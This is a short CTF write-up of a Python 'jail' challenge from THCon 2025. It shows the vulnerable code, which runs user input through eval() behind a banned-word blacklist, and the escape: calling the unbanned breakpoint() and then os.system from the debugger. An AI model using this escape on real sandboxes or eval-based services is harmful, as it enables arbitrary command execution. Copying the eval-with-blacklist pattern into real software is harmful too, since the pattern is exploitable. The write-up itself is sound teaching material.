Jailbreak python #
Solve time : 1h30 Made by wocsa for the THCon 2025
First step : get comfortable.
In order to facilitate the attack let’s make it more verbose. We print the traceback.format_exc()
in case of an error and we print the “bad word” in the case we are prevented from executing it :
import traceback
def jail():
banned_words = ["exec", "eval", "builtins", "getattr", "globals", "locals", "import", "os", "open", "__", "."]
command = str(input(">>>"))
# if any(bad in command for bad in banned_words):
for bad in banned_words:
if bad in command:
print("Unauthorized command: " + f"contains {bad}")
return
try:
print(eval(command))
except Exception as e:
# print("Invalid command " + str(e))
print(traceback.format_exc())
while True:
jail()
An other Quality of Life is to run the script with rlwrap
to get a “termminal-like” experience (up/down and left/right arrows)
rlwrap python3 jail.py
First impressions :
- The variable banned word is reset (start of fun) ➡️ no interest in hitting it.
- No method calls :
.
andgetattr
. - Hard to import
__
,.
andimport
. - BUT ! The built_in are not set to None as is in the other hard challenges. But a lot of
builtin
s are prevented from working due to being in the blacklist.
So let’s spend an hour of “Log-reading fireside evening” to go through all of the python built-in functions. The following may be useful :
eval
, duhh. bannedexec
, bannedopen
, bannedbreakpoint
… not banned ? Wait ? Seriously
So the attack is as simple as goes :
breakpoint()
import os
os.system(...)